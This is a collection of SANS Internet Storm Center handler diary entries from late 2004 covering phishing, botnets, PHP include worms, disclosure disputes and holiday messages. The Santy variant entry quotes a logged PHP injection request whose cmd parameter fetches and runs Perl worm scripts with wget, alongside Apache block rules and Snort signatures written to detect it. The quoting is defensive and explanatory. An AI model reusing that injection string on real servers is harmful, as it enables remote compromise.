2004 - What a year this has been.

We have seen everything from soup to nuts and then some. We have seen a rapid rise in phishing schemes. Paypal and eBay are no longer the only targets. Most banks have been targeted as well as BestBuy. (It is hard to believe that people are still falling for these).

We have seen a rise in botnet activity. I can personally attest to them. I have cleaned many a computer that has been the victim of a botnet attack. (I can't wait to see what is instore for us in 2005).

We have seen an increase in Rootkits, worms, viruses and malware. All with their own little nasty after affects.

I for one vote that we lobotimize the script kiddies, malware authors and the marketing people using their software.
Your Choice for Diary of the Year

In November I asked our faithful readers to tell us what they thought the best diary of the year was. The Tom (I Love Orange) Liston fan club (or Tom and all of his aliases) registered in loud and clear. He without a doubt received the most votes for his Follow the Bouncing Malware Series. I have to admit, I too thought it was great. I just wish I had his writing style and flair. Tom you do deserve the honor of Handler of the Year.

Second runner up was Cory Altheide with his story of Halloween Terror. Again I have to agree with the readers. Great job Corey.

We also received several emails from our readers stating that all of the diaries were great. That all should be voted the best. Thanks to all of you who voted. And thanks to all of you who gave such positive feedback. I think that I speak for all of the volunteers at the Storm Center when I say that we enjoy doing what we do. We enjoy hearing from all of you.

Happy New Year
I would like to personnally wish each and everyone of you a healthly, happy and secure 2005.

I especially want to extend my greetings and my thanks to all of my fellow handlers around the globe. All volunteer time and talents to anyone who is interested and wants to learn more. We receive no monetary pay for what we do, however we receive something much more valuable, friendship and camaraderie. I have learned so much from each of them. So to each of you my fellow Handlers, Happy New Year and May You Thrive in 2005.

Handler On Duty

Deb Hale
haled@pionet.net

For those of you that are interested - here is a sample of the 2004 Diaries.


January:

New SoBig Wave

http://isc.sans.org/diary.php?date=2004-01-15

MyDoom.A

http://isc.sans.org/diary.php?date=2004-01-27

February:

Microsoft ASN.1 vulnerability (MS04-007)

http://isc.sans.org/diary.php?date=2004-02-10


Netsky virus

http://isc.sans.org/diary.php?date=2004-02-18

March:

Virus writers declare war

http://isc.sans.org/diary.php?date=2004-03-03

BJs Alerts of Possible Credit Card Theft

http://isc.sans.org/diary.php?date=2004-03-12

April:

Major Microsoft vulnerabilities

http://isc.sans.org/diary.php?date=2004-04-13
Cisco Vulnerabilites and Metasploit 2.0


http://isc.sans.org/diary.php?date=2004-04-07


May:

Sasser and Phatbot authors caught


http://isc.sans.org/diary.php?date=2004-05-08

Symantec Firewall Vulnerabilities

http://isc.sans.org/diary.php?date=2004-05-13

CVS Vulnerability

http://isc.sans.org/diary.php?date=2004-05-19


June:

Cisco BGP DoS

http://isc.sans.org/diary.php?date=2004-06-16

ISCAlert and sober.h

http://isc.sans.org/diary.php?date=2004-06-17

Russian Hacks/download.ject


http://isc.sans.org/diary.php?date=2004-06-24

July:

Bagle Source Code Release

http://isc.sans.org/diary.php?date=2004-07-07

Distributed Brute Force FTP Scans

http://isc.sans.org/diary.php?date=2004-07-09

Follow the Bouncing Malware I

http://isc.sans.org/diary.php?date=2004-07-23

August:

XPSP2 released

http://isc.sans.org/diary.php?date=2004-08-09

Follow the Bouncing Malware II

http://isc.sans.org/diary.php?date=2004-08-23

September:

MS .jpg vulnerability (MS04-028)

http://isc.sans.org/diary.php?date=2004-09-14

GDIScanner

http://isc.sans.org/diary.php?date=2004-09-23

Botnets

http://isc.sans.org/diary.php?date=2004-09-25


October:

Ten bulletins (7 critical) released by MS

http://isc.sans.org/diary.php?date=2004-10-12

Multiple Browser Vulnerabilities

http://isc.sans.org/diary.php?date=2004-10-20

November:

A Terrifying Tale of TCP ... Terror

http://isc.sans.org/diary.php?date=2004-11-01


IFRAME

http://isc.sans.org/diary.php?date=2004-11-02

Follow The Bouncing Malware (Part III)

http://isc.sans.org/diary.php?date=2004-11-04

Sun JVM Vulnerability

http://isc.sans.org/diary.php?date=2004-11-23

Follow The Bouncing Malware (Part IV)

http://isc.sans.org/diary.php?date=2004-11-24
December:

Santy worm

http://isc.sans.org/diary.php?date=2004-12-21

PHP Include Worm

http://isc.sans.org/diary.php?date=2004-12-27
Time is running out for *you* to write your diary!

We are planning a diary for the first week of the New Year that is exclusively a "Reader's Diary". This will be a diary of inputs from you, our readers, to the rest of the world. We are looking for inputs that pertain to ISC, the Internet, New Year Predictions, suggestions, 'thank you' notes, almost anything (within reason). We will try to get all of the inputs posted, and they will be available for reading on January 2nd/3rd. Please include your name and valid email address. Names will be posted, however email addresses will be kept private.


Please submit entries to newyear@isc.sans.org by Jan. 2nd 1200hrs GMT to be added to the diary.

Brute force scanning against MS SQL server accounts

This isn't necessarily new, but the Bad Guys (tm) are still trying to
break into Microsoft SQL servers using brute force techniques. We
received a packet capture from one site that had 96 password attempts
in 4 seconds. We believe that the tool being used is called SQLck.exe.
When running on a compromised server, it will likely consume 100% CPU.
If you have a compromised server with this binary, please send it to
us.


Maybe now would be a good time to validate the following security
practices with regard to ALL database platforms:


1. Do you really need to have the SQL server ports open to the outside
world? You should have a firewall in front of your database filtering
the inbound traffic. If you need the ports open to the Internet,
consider restricting the source IP addresses that can connect.


2. Are you sure that you have a strong password for the SQL admin
accounts? The Bad Guys (tm) are using very large dictionary lists
(60,000+ words) to break into your server.


3. Do you have your IDS system alerting on failed login attempts?
The Snort signature ID is 688: MS-SQL sa login failed.


Are you paranoid enough?

Warning!! Do not go any further if you read your e-mail with a tin-foil
hat or if a secret government agency has broken into your computer!


So there has been some interesting events unfold recently on the various
security mailing lists. The first is an alleged backdoor in two
security products (which has yet to be confirmed). The second is a bug
in the NASM compiler that could give an attacker your privileges if you
compile his code with NASM.


These things got me thinking about compilers, source code, and trust.
When it comes to computers, can you trust any program that you didn't
write yourself? Ken Thompson wrote a very nice article in August 1984
on this very topic called "Reflections on Trusting Trust."


Reprint here: http://cm.bell-labs.com/who/ken/trust.html


ISC Reader's Diary


We are planning a diary for the first week of the New Year that is exclusively a "Reader's Diary". This will be a diary of inputs from you, our readers, to the rest of the world. We are looking for inputs that pertain to ISC, the Internet, New Year Predictions, suggestions, 'thank you' notes, almost anything (within reason). We will try to get all of the inputs posted, and they will be available for reading on January 2nd/3rd. Please include your name and valid email address. Names will be posted, however email addresses will be kept private.


Please submit entries to newyear@isc.sans.org by Jan. 2nd 1200hrs GMT to be added to the diary.



[eof]

Update to the virus report below

Looks like the virus below is an old version of Bagle, specifically W32/Bagle.j@MM or W32/Bagle.n@MM which appeared in March of 2004. We are still trying to validate the binary attachment is the same. If anyone has an e-mail attachment that is not detected by existing anti-virus signatures, please send them to us.


http://vil.mcafeesecurity.com/vil/content/v_101071.htm

http://vil.mcafeesecurity.com/vil/content/v_101095.htm


Another Virus (update to the original diary)

We just got a report about a new virus spreading. Like other viruses in the past,
it claims to come from the users ISP. Pretty well done, so you may want to try and filter it, or at least reminder your users not to click.

Sample (the 'ISP.NET' parts will be replaced with the recipients domain name):

(if you can, just block e-mail from 'administrator@yourdomain' at your external email gateway. Typically, if you use such an account, your gateway will not receive email from the outside with that that 'From' address)
From: administration@ISP.NET [mailto:administration@ISP.NET]

Sent: Wednesday, December 29, 2004 10:28 PM

To: user@ISP.NET

Subject: E-mail account disabling warning.
Hello user of ISP.NET e-mail server,
Our main mailing server will be temporary unavaible for next two days,

to continue receiving mail in these days you have to configure our free

auto-forwarding service.
For details see the attach.
Have a good day,

The ISP.NET team http://www.ISP.NET
(spelling of the e-mail is left in its original state. We don't have the attached binary right now. If you have it, send it to us via our contact page http://isc.sans.org/contact.php .

ISC Poll Results

We asked you what the most overrated security topics are and you answered. The top three results were:

Cyberterrorism (37%)

Correct Spelling (18%) - Johannes can no longer be faulted for typo's :)

Phishing (13%)


I certainly agree with cyberterrorism being overrated (though I'd say more overhyped), but phishing in my opinion is still an underrated threat. At least in the US it is, as the few times I dug into some of these phishing scams there was not a small amount of compromised accounts involved. I am surprised by the fact that there hasn't been large scale exploitation, however.

Port 1433 scans

The UNISOG list has had reports of an increase in TCP port 1433 scanning. We haven't seen it, but if you have and have packet captures, please send them along for us to analyze.


ISC Reader's Diary

We are planning a diary for the first week of the New Year that is exclusively a "Reader's Diary". This will be a diary of inputs from you, our readers, to the rest of the world. We are looking for inputs that pertain to ISC, the Internet, New Year Predictions, suggestions, 'thank you' notes, almost anything (within reason). We will try to get all of the inputs posted, and they will be available for reading on January 2nd/3rd. Please include your name and valid email address. Names will be posted, however email addresses will be kept private.


Please submit entries to newyear@isc.sans.org by Jan. 2nd 1200hrs GMT to be added to the diary.

#49



Hey... we always knew he was "da man," but now it’s official. Network World Fusion has announced its listing of "The 50 Most Powerful People in Networking" and our very own Johannes Ullrich clocks-in at number 49. While we certainly question how they could ever place 48 others ahead of him (honestly, how many of them could decode an IPv4 packet from a hexdump? Gates? Balmer? Fiorina? Ellison? Oh, please...) we wholeheartedly agree that Dr. J is a power to be reckoned with. Congratulations pal!



http://www.nwfusion.com/power/2004/12270450most.html



Does Your Search Engine Need A Tune-up?



We’ve had some reports over the past several days from folks about some odd search results. It appears that some searches at Google have been "seeded" with malicious sites that, when examined, have only a passing connection to the search terms entered. These sites are appearing near the top of the result listings and attempt to exploit various browser vulnerabilities to deliver malware to unwary (and unpatched) surfers. Most of the sites are new (with domain names having been only recently registered) and don’t appear to have been cached by Google. If you come across sites meeting this description, let us know the search terms that led you there.



Up On My Soapbox



Every time I see one of the current spate of AOL television ads portraying their customers as clueless morons I want to scream. It’s not that I have some sort of deep-seated respect for the intelligence of AOL users, but rather, these ads represent, far too well, the current industry mindset, which treats computers as home appliances.



"Don’t worry about viruses and spyware," AOL explains, "we’ll take care of that for you... Plug it in, turn it on, and disengage your brain..."



Pay attention, you’re about to read something vitally important: COMPUTERS ARE NOT APPLIANCES. THEY ARE TOOLS. Tools require that their user be skilled. Tools require education and training to use. Tools require a level of involvement beyond that of an appliance because "tool use" carries with it an inherent danger. To understand the difference between tools and appliances, simply consider for a moment the number of "important safety warnings" found in the user manual of, say, your average refrigerator, versus, say, the number found embossed on the side of your average ladder.



And yet, over the past decade, the computer industry has deliberately ignored the nature of its product. It has attempted to grind off the sharp edges, to put padding on the corners, and to make a "consumer safe" appliance from these inherently dangerous tools.



The current state of security on the Internet is simply reaping the seeds we have sown.



Computers are not appliances. If something goes wrong with your refrigerator, it doesn’t attack your neighbor’s microwave. If you don’t patch your toaster oven, the chance that it will join up with other toaster ovens in a denial of service attack against the White House is negligible. Yet we persist in marketing computers in a way that presents their operation as requiring the same degree of knowledge and skill as is required to operate a toaster oven.



Beyond the simple fact that computers are tools, and thus requiring more involved and knowledgeable operators, computer use in the twenty-first century is very network-centric. Thus, irresponsible and dangerous behavior on the part of an untrained user can have serious repercussions for, quite literally, millions of others. We don’t allow untrained and inexperienced drivers onto our streets, but any yokel with $9.95 a month can get on the Internet.



The time has come for change. Users cannot continue to proxy the responsibility for their security to others. If they’re going to use this tool, they need to be trained or they need to pull the plug (or have the plug pulled for them).



What can you do? Teach.



Organize a community "adult ed" class to teach people security basics. Sit Aunt Sophie down and make sure that she has (and, more importantly, understands why she needs) a firewall and virus scan. Check with your local School District and make sure that while they’re teaching the impressionable young ‘uns how to create a graph using Excel, that they’re also teaching them safe computing habits. Scout your neighborhood over the next week, looking for discarded Christmas computer boxes, and knock on the door and offer your services.



We’ll all be glad you did.



But be sure you teach. Don't just do it for them. The worst disservice you can do for another human being is to assume that they're incapable of taking responsibility for themselves. Remember: If you build a man a fire, you'll warm him for a day. If you set a man on fire, you'll warm him for the rest of his life. ;-)



Auld Lang Syne



Finally, I want to say a simple and heart-felt "Thank you" to two important groups:



To the readers: Thank you for listening. I hope you’ve found something interesting in what the Handler’s Diary has had to say over the past year. We’ve undoubtedly made mistakes. We’ve undoubtedly said things that have upset some people. But, you can always trust that we’re spending our time doing this because we sincerely want to help, and that’s what makes this forum so different and so very special.



And to the Handlers: Thank you for being the amazing group of people that you are.



ISC Reader's Diary

We are planning a diary for the first week of the New Year that is exclusively a "Reader's Diary". This will be a diary of inputs from you, our readers, to the rest of the world. We are looking for inputs that pertain to ISC, the Internet, New Year Predictions, suggestions, 'thank you' notes, almost anything (within reason). We will try to get all of the inputs posted, and they will be available for reading on January 2nd/3rd. Please include your name and valid email address. Names will be posted, however email addresses will be kept private.


Please submit entries to newyear@isc.sans.org by Jan. 2nd 1200hrs GMT to be added to the diary.




----------------------------------------------------------------------------

Handler on Duty : Tom Liston < http://www.labreatechnologies.com >

ISC Reader's Diary

We are planning a diary for the first week of the New Year that is exclusively a "Reader's Diary". This will be a diary of inputs from you, our readers, to the rest of the world. We are looking for inputs that pertain to ISC, the Internet, New Year Predictions, suggestions, 'thank you' notes, almost anything (within reason). We will try to get all of the inputs posted, and they will be available for reading on January 2nd/3rd. Please include your name and valid email address. Names will be posted, however email addresses will be kept private.


Please submit entries to newyear@isc.sans.org by Jan. 2nd 1200hrs GMT to be added to the diary.

PHP Include Worm

It seems I came back from the holiday with the same mess on the Internet that was there when I left. Various forms and copycats of PHP Include worms are out there, and the AV vendors have adopted other nomenclatures to these variants due to the differences between this and the Santy strains. K-Otik has a write-up here: http://www.k-otik.com/news/20041226.PhpIncludeWorm.php

I imagine this will persist as long as people have vulnerable PHP installations out there and do not upgrade, however the methodology of detecting vulnerable machines will continue to change over time.

Trojan in wild that exploits new IE bug

OOPS! Update (by TL, 20:00 GMT):

Looks like we might have mis-spoken on this one. Earlier versions of the diary said that Trojan.Phel.A didn't affect WinXP SP2, but it appears that it only affects that platform. Also, despite what we said, this really didn't tie into the vulnerabilities discussed in the December 23rd diary... Dang. Strike two! Bad Handlers! BAAAAAD Handlers... no donut! (Thank you, James, for pointing that out!)



Symantec has released an alert on the first exploit out there, Trojan.Phel.A. More here: http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html and
http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm

Thanks to Chris Mosby for the link.

Pacific Earthquake & Tsunami

Our condolences to any affected by the tragedy in South Asia with the earthquake and resulting tsunami.
----

bambenek /at/ gmail -dot- com

php users, Update php and AV sigs, MS users, Update your AV sigs



A few of the pairs of eyes in the FOSS (Free and Open Source Software) community recently looked over the security of php, and as a result of that community effort developers released new versions in a flurry last week. If you haven't updated, please do so asap.



A php Internet worm released on 12/25/2004 that doesn't use php bulletin boards - it attacks "ALL php scripts/pages which are vulnerable to a "File Inclusion" Flaw".



K-OTik Security has issued an Alert to clarify issues relating to whether or not php worms commonly named santy.c and santy.e attack bulletin boards.



They have demonstrated that a php worm released on 12/25/2004 and commonly called santy.c and santy.e has had incorrect information associated with the descriptions of it that may delude you into thinking that, since you do not use php bulletin boards, your server is not at risk. K-OTik Security has named this the PhpInclude.Worm and their alert is emphatic that "This worm attacks ALL php scripts/pages which are vulnerable to a "File Inclusion" Flaw (related to an insecure use of the Include() & Require() functions).



these "programming" flaws are independent from the server's PHP version, they result from common coding mistakes"



K-OTik has described this worm as a significant threat. And from what I've seen this shift and weekend you may not be configured to "Dodge This".



The K=OTik Alert is at:

http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php
For background PhpInclude information see the summary:


http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/




Also, some AV Vendors have responded quickly to the rash of php Internet worms and santy variants, and have also added protection for recent exploits aimed at MS products. For additional information check out yesterday's Diary, and the Handlers Diary from 12-17-2004:

http://isc.sans.org/diary.php?date=2004-12-17
or the F-Secure Weblog.

http://www.f-secure.com/weblog/




"boxing-day" Incident Response



One of the most enjoyable exchanges I had this shift was with Arjan van der Oest who responded with professional alacrity to a report from the ISC of malicious activity. Arjan ended one of his emails with the sentence "Enjoy your boxing-day!" and I got the meaning of his use of "boxing" immediately, incident response to 0wn3d b0x3n. Arjan's use of the word "boxing" as a description of all of our incident responses to the php Internet worm variants (yesterday and for the next few days) really "made" the early morning hours of today for me, all before coffee was even done. If this is a new use of the word "boxing", and it surely is appropriate, "Salute Arjan!". And even if it's not a new use of the word "boxing" for describing Incident Response to 0wn3d b0x3n, "Salute Arjan!".



Readers and Reporters - Thanks for your 2004 submissions.



SANS has multiple lists and their participant's reports, observations and analysis "from the field" regularly equal and exceed infosec offerings by a load of other sources. I appreciate your submissions immensely. So .... I thank all of you very much and best wishes for 2005! And as far as the new year goes, any year when the "originals" continue to post extensively to other public list forums is a great year, and I hope that in 2005 they continue sharing their insights.



More Thanks



Over the last 2 days we have received many reports and samples of the php santy Internet worm variants. In addition many submissions contained detailed information and evidence sufficient to get many bot servers and malware storage systems taken offline. Here's another "Thank You" to the ones who can be publically acknowledged for your community efforts. Thanks! Will Beers, K-OTik Security Research & Monitoring Team, Matt Jonkman and the folks at www.bleedingsnort.com, Handler Erik Fichtner, Handler Koon Yaw Tan, Pascal Zoutendijk, den_RDC, Daniel Hay, Arjan van der Oes, Paul Laudanski, Razz, Handler Donald Smith and ISC CTO Johannes Ullrich.



2005, out with the old? Nope. (..trends.. and personal opinion)



There have been many excellent threat trend analysis' published this year. I thank all of the vendors for their efforts and information sharing.



fwiw, I find one trend, a MM that "uses (usermode) rootkit techniques", troubling (more below at the end, in the Rootkit Trend item). And I hope that sales of IDS's in 2005 don't take a hit for any reason this year, because it'd be a real shame if something like a NIDS' deployment decision receives fewer network resource allocation$ than "compliance" software. Compliance software isn't going to detect anything a rootkit is sending out of your network using HTTP (another troubling trend), and by the time AV vendors get a signature deployed for each days new rootkit variants, the "horse already left the barn". I'm not slamming the AV vendors here, their rapid deployment of protection against easily deployed exploits for unpatched vendor vulnarabilities is a very positive trend.

As usual, I reviewed available information and put together some thoughts, and as usual, they're based on other people's great work. Errors are my own though, and I note I religiously scan for indications of the NIH virus.



How to prevent usermode rootkit installation:

1. Don't run the attachment ( ... user education has been an explicit issue for more than 10 years iirc ......)



2. Prevent dll injection and hooking (protecting critical system files has also been an explicit issue for more than 10 years iirc ......):



DiamondCS ProcessGuard and Sygate's Firewall
http://www.diamondcs.com.au/processguard/
http://www.sygate.com
3. "Just Say No" to Admin and System priveleges - Configuration and Change Management;

CIS Benchmarks
"The practical CIS Benchmarks support available high level standards that deal with the "Why, Who, When, and Where" aspects of IT security by detailing "How" to secure an ever widening array of workstations, servers, network devices, and software applications in terms of technology specific controls."
http://www.cisecurity.org/

Visible Ops
http://www.itpi.org/home/default.php
4. Other - prevention or latent detection:



... keep up to "Day" (nay, _hour_) AV def's. (although this is something that is critical for an email gateway, accomplishing it for the masses is problematic, a trend that is promising is ISP inclusion of AV in their offerings. How a solution is going to be found for the bandwidth impaired escapes me.



5. Rootkit Boxing - Incident Response:



A. Flatten the system, not the user.


\
B. Have incident responders armed with security response tools for remote incident management and onsite incident response using bootable CD's with capable tools.



C. Train them in how to use those security tools to flatten systems or detect rootkits (and no, I do not mean that the responders need to be trained to do an Alien system autopsy).



STD Knoppix

http://www.knoppix-std.org/download.html
Winternals Administrator's Pak

http://www.winternals.com/products/repairandrecovery/index.asp?pid=ap


Winternals ERD Commander 2003

http://www.winternals.com/products/repairandrecovery/erdcommander2002.asp?pid=erd

Training

SANS@HOME - X, -Jan 27-May 05, 05
Security 504: Hacker Techniques, Exploits & Incident Handling With Ed Skoudis
http://www.sans.org/athome/details.php?id=816


SANS@Home - XI, -Feb 02-23, 05
Security 601: Reverse-Engineering Malware With Lenny Zeltser

http://www.sans.org/athome/details.php?id=823
"The SANS@HOME Instructor Led program meets the demand for high quality information security training in a convenient setting that is right for you. The sessions are conducted by SANS best. The same SANS Certified Instructors you would find at a six-day onsite conference. SANS@HOME - IL offers flexibility, affordability and critical information security training without the travel."

Book of the Year?

Exploiting Software - How to Break Code
By Greg Hoglund, Gary McGraw

http://safari.informit.com/
Publisher : Addison Wesley
Pub Date : February 17, 2004
ISBN : 0-201-78695-8

More information is at;

ROOTKIT - The Online Rootkit Magazine, try downloading the kits and see how long they've been working on avoiding detection in Safe Mode, and looking at and using other device firmware, and there is a "rut ro" I hope some security application vendors are looking at, "intermediate driver" research.
http://www.rootkit.com/index.php

As a related fwiw, MS's "new" stack design is linked next (legitimate application vendors, I feel your pain):
"Introducing the Windows Filtering Platform
This paper provides information about the Windows Filtering Platform (WFP) for Microsoft® Windows® codenamed “Longhorn”."
http://www.microsoft.com/whdc/device/network/WFP.mspx

Rootkit Trend:

Websense, thanks! for the inertia kick analysis.
"December 16, 2004 Malicious Code / Phishing Alert: Maslan.c"

http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=95


More Info

W32/Maslan.c@MM

http://vil.nai.com/vil/content/v_130324.htm
"stealths its presence on the victim machine"

"Browser Monitoring"

"The worm monitors (monitors = keystroke logger) browser sessions where the window title contains one of the following strings:

paypal
trade
bank
mail
e-gold
e-bullion
evocash"

"Aliases
Name Backdoor.Win32.SdBot.ts (AVP, dropped bot) Net-Worm.Win32.Maslan.b (AVP) PE_MASLAN.C (Trend) W32.Maslan.C@mm (Symantec) W32/Maslan-C (Sophos) W32/Sdbot-RW (Sophos, dropped bot) Win32.HLLM.Alaxala (Dialogue Science)"

W32.Maslan.C@mm

http://securityresponse.symantec.com/avcenter/venc/data/w32.maslan.c@mm.html
"Uses rootkit techniques to prevent the files and processes whose "names start with ___ (three underscore characters) from being visible to users. This may also cause the Task Manager to fail to start."

"Logs keystrokes."

Patrick Nolan

Santy Variant?

Merry Christmas! Unfortunately, the greetings from Marcus to all our readers has to keep short.

http://isc.sans.org/diary.php?date=2004-12-24

We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm.

It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.

"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;

wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;

wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;

wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;

perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"

You can see that the files pull off include:

spy.gif (which contains a script)

spybot.txt

worm1.txt

php.txt

ownz.txt

zone.txt


worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system.

$site = "www.google.com";

$procura = "inurl:viewtopic.php?t=$numero";

spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667.

From other piece of logs submitted, we have IRC server as:

ssh.gigachat.net

leaf-sunwave.animirc.net

eu.undernet.org

irc.efnet.net


Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include:

adfkgnnodfijg

bot

bot.txt

bot.txt.1

dry.scp

ssh.a

terrorbot.txt

terrorbot.txt.1

terrorworm.txt

terrorworm.txt.1

unbot.txt

unbot.txt.1

unbot.txt.2

unbot.txt.3

unworm.txt

unworm.txt.1

unworm.txt.2

unworm.txt.3

worm1.txt

worm.txt

worm.txt.1


One of our readers has blocked this attack with apache conf directives as such:

SetEnvIf User-Agent "LWP::" get_lost

SetEnvIf User-Agent "lwp-trivial" get_lost

<Directory /usr/local/apache/htdocs/your_phpdirectory>

Order Allow,Deny

Deny from env=get_lost

Allow from all

</Directory>


Another reader has created this apache rule:

<Directory /*>

RewriteEngine On

RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]

RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)

RewriteRule ^.*$ - [F]

</Directory>


K-Otik has published a copy that uses AOL/Yahoo search instead.

http://www.k-otik.com/exploits/20041225.SantyB.php

Let us know if you have seen the same thing.

Here are some Snort signatures written by Erik:

alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|q=inurl|3a2a|
.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype:
trojan-activity; sid:900024; rev:1; )

alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|"; nocase;
content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase;
within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity;
sid:900024; rev:2; )

alert tcp $HOME_NET any -> any 80 (msg: Santy.B worm variants
serarching for targets (yahoo)"; content:"GET /search|3f|";
nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|=";
nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=
1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established;
classtype: trojan-activity; sid:900024; rev:3; )

alert tcp $HOME_NET any -> any 6667 (msg:"Suspected Botnet
Activity"; classtype: string-detect; sid:900025; rev:1;
tag:session,50,packets; content: "PRIVMSG"; nocase;
pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|
Total pacotes|Total bytes|Média de envio|portas? aberta)/i"; )

alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "suspected
php injection attack"; content: "GET /"; nocase; content:
".php|3f|"; nocase; within: 64; pcre: "/(name=http|
cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,
established; classtype: trojan-activity; sid:900026; rev:1; )

Bleedsnort has also created some Snort signatures to detect this:

http://www.bleedingsnort.com/

Use them as you deem fit.
Year End Poll

Earlier, we have asked you what is your favorites diary:

http://isc.sans.org/diary.php?date=2004-12-12

Have you send us your vote? If not, send us your choice now. We will close the poll on New Year eve and let you know the result soon after.

Merry Christmas to All! To all of the Internet Storm Center readers around the world, I want to extend a hearty Merry Christmas, Happy Holidays, and best wishes for the coming year. As you probably know, everybody in the Storm Center family is a volunteer. We've got a few dozen volunteer incident handlers, several thousand volunteer DShield sensor operators, plus countless other people who volunteer their own time in tracking down events on the Internet then email us their analysis and thoughts. Without the tremendous effort put forth by everybody, the Storm Center would not be where it is today. Thanks, Family!!!

I was working on an adaptation of The Night Before Christmas for today's diary, and had planned to call it "The Night Before 0-Day" but since we had a nice release of 0-days yesterday I think I'll save it for next year. Instead, let me offer our readers a corny adaptation of the Twelve Days of Christmas. If you are a true geek and your significant other is still wondering what you would like to see under the tree, try this out:

On the 1100 Day of Christmas, my true love gave to me

- Twelve Months of TIVO

On the 1011 Day of Christmas, my true love gave to me

- Eleven Pentium Processors

On the 1010 Day of Christmas, my true love gave to me

- XM Satellite Radio

On the 1001 Day of Christmas, my true love gave to me

- Nine Linux Servers

On the 1000 Day of Christmas, my true love gave to me

- Eight Mega Pixels

On the 0111 Day of Christmas, my true love gave to me

- Seven Speaker Soundsystem

On the 0110 Day of Christmas, my true love gave to me

- Six-ft Plasma TV

On the 0101 Day of Christmas, my true love gave to me

- Five Sonet Rings

On the 0100 Day of Christmas, my true love gave to me

- Forty GB iPod

On the 0011 Day of Christmas, my true love gave to me

- Three GHz Laptop

On the 0010 Day of Christmas, my true love gave to me

- Two Access Points

On the 0001 Day of Christmas, my true love gave to me

- An iPAQ Pocket PC

More Details on Recent Vulnerabilities. Yesterday we mentioned some new vulnerabilities with proof-of-concept code that affect Windows systems, plus we mentioned the release of Oracle vulnerability details by David Litchfield. We received a number of requests for links to additional information on these issues. Here are a few:

Windows Issues, original notification

http://www.xfocus.net/flashsky/icoExp/index.html


Bugtraq Discussion

http://www.securityfocus.com/archive/1/385332/2004-12-21/2004-12-27/0

http://www.securityfocus.com/archive/1/385340/2004-12-21/2004-12-27/0

http://www.securityfocus.com/archive/1/385342/2004-12-21/2004-12-27/0


Oracle Issues

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0052.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0053.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0056.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0057.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0058.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0059.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0060.html

http://archives.neohapsis.com/archives/vulnwatch/2004-q4/0061.html


One more just to make your weekend phun

Automated Windows XP SP2 Remote Compromise http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm





Marcus H. Sachs

Director, SANS Internet Storm Center

Handler on Duty

I'm not dreaming of a 0-day Xmas



The holiday news continues to be bleak, with a pair of critical vulnerabilities
for Windows NT/2000/2003/XP. First, unless you're running XP SP2, there is
a buffer overflow in the LoadImage API, resulting in bitmaps, icons, and
animated cursor data files (.bmp, .cur, .ico, and .ani) that can be exploited
via HTML delivered either via email or a website. This vulnerability can be
used to execute code. Secondly, there is a heap overflow in winhlp32.exe
while processing help files on Windows, including XP SP2, apparently. Try not
to install help files until some Tuesday in, we hope, January.




Irresponsible Disclosure




On 31 August 2004, Oracle released patch number 68 to correct a large number of vulnerabilities in nearly all production versions of the Oracle
database software. In conjunction with this, the discoverer of these vulnerabilities released a notification that the flaws existed, that they
deserved your attention, and that he was going to withhold details of the vulnerabilities for three months; until 31 November 2004, to give
Oracle administrators ample time to patch, and the rest of the InfoSec community time to twiddle their thumbs aimlessly.



Likewise, said discoverer also found flaws in the IBM DB2 database, and released information on them with similar time parameters. 9 September 2004
to 1 December 2004.



1 December 2004 came and went with nary a mention of the details of any of these vulnerabilities.



Today, 23 December 2004; a time when many database administrators who have not already left on holiday vacation are starting to plan their extended
holiday weekend, this "responsible discloser" lets the other shoe drop on these vulnerabilities. Pardon me, but exactly what message is
this action trying to send? That if you failed to get your patching done before details of these flaws were released, you apparently deserve to
have your holiday plans potentially ruined? For the record, I'm personally partial to the "full disclosure" method, but releasing exploit
details immediately prior to a major holiday is mean, spiteful, and rude.



You could have waited until 1 January 2005 with no further ill effect, or released the information on 1 December 2004 as you originally promised.



David Litchfield, you sir, are a grinch. Nice going.



By the way, if you haven't already patched; yes, they're serious vulnerabilities. http://metalink.oracle.com/ , http://www-306.ibm.com/software/data/db2/udb/support/downloadv7.html ,and http://www-306.ibm.com/software/data/db2/udb/support/downloadv8.html



The opinions contained within this diary entry are personal opinions, and not representative of the entire Internet Storm Center, or the SANS Institute, or really anyone else, for that matter.



Further information on the Snort DoS



